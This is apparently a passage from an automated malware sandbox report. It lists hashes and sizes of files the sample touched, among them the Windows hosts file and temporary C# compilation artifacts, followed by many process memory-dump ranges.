                                                                                                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                SHA256

                                                                                                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                SHA512

                                                                                                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                Download Submit

                                                                                                              • C:\Windows\System32\drivers\etc\hosts
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                6e2386469072b80f18d5722d07afdc0b

                                                                                                                SHA1

                                                                                                                032d13e364833d7276fcab8a5b2759e79182880f

                                                                                                                SHA256

                                                                                                                ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                                                                                SHA512

                                                                                                                e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                                                                                Download Submit

                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\y0usiqio\CSCFC90D99ABC045BC82CACA452B74165.TMP
                                                                                                                Filesize

                                                                                                                652B

                                                                                                                MD5

                                                                                                                baed9fda34c44a7370a69ecf8c2ca846

                                                                                                                SHA1

                                                                                                                3ea236f4cd4551a44239257f482640f6ccbbad0d

                                                                                                                SHA256

                                                                                                                193cbcd6c21d81f455d68fbefead575b00054d45b3cd34e269e7ec5e1ecc5fb1

                                                                                                                SHA512

                                                                                                                de1d61832d35c51d49600304bdcdd668b2360dc013b22be6064221f6368ec9abbfd6c9c5e8fa6cd79cca2586522c00ac5679e69c534d973ed19aace75582f366

                                                                                                                Download Submit

                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\y0usiqio\y0usiqio.0.cs
                                                                                                                Filesize

                                                                                                                1004B

                                                                                                                MD5

                                                                                                                c76055a0388b713a1eabe16130684dc3

                                                                                                                SHA1

                                                                                                                ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                SHA256

                                                                                                                8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                SHA512

                                                                                                                22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                Download Submit

                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\y0usiqio\y0usiqio.cmdline
                                                                                                                Filesize

                                                                                                                607B

                                                                                                                MD5

                                                                                                                5d72ca2d49f125c8cc03c8cce13cecc3

                                                                                                                SHA1

                                                                                                                44b611492eeb66e2a798581898439818f0bfc524

                                                                                                                SHA256

                                                                                                                46466b4e8427d3a01f7afbc2c86c27f6e99fb009ac9a879609e9263282b4d631

                                                                                                                SHA512

                                                                                                                d630b1cd58a900cd79726351ddbbc889006b92ec6804db1ff9393954bee9ba7e6f400ea7cc9234d1229f8f0e2b7f2d37409c3b1c2c3e04a7eeb1828b87e2849f

                                                                                                                Download Submit

                                                                                                              • memory/440-72-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/512-71-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/620-67-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/908-69-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/1036-73-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/1204-80-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/1340-65-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/1692-70-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/1928-68-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/1996-79-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/2296-78-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/2432-74-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/2532-179-0x00007FF8E60F3000-0x00007FF8E60F5000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/2532-180-0x00007FF8E60F0000-0x00007FF8E6BB1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                                Download

                                                                                                              • memory/2532-0-0x00007FF8E60F3000-0x00007FF8E60F5000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/2532-94-0x00007FF8F4D03000-0x00007FF8F4D04000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/2532-1-0x000002116B920000-0x000002116B942000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                                Download

                                                                                                              • memory/2532-11-0x00007FF8E60F0000-0x00007FF8E6BB1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                                Download

                                                                                                              • memory/2532-16-0x0000021173E80000-0x000002117483A000-memory.dmp

                                                                                                                Filesize

                                                                                                                9.7MB

                                                                                                                Download

                                                                                                              • memory/2532-15-0x00000211514F0000-0x00000211514F8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                                Download

                                                                                                              • memory/2532-14-0x000002116BE00000-0x000002116BE76000-memory.dmp

                                                                                                                Filesize

                                                                                                                472KB

                                                                                                                Download

                                                                                                              • memory/2532-13-0x000002116B9A0000-0x000002116B9E4000-memory.dmp

                                                                                                                Filesize

                                                                                                                272KB

                                                                                                                Download

                                                                                                              • memory/2532-12-0x00007FF8E60F0000-0x00007FF8E6BB1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                                Download

                                                                                                              • memory/2712-75-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/3148-173-0x00000254B2BD0000-0x00000254B2BD8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                                Download

                                                                                                              • memory/3188-66-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/3464-17-0x0000000002D60000-0x0000000002D8A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                                Download

                                                                                                              • memory/3464-64-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/3600-77-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/3652-76-0x00007FF8C4750000-0x00007FF8C4760000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download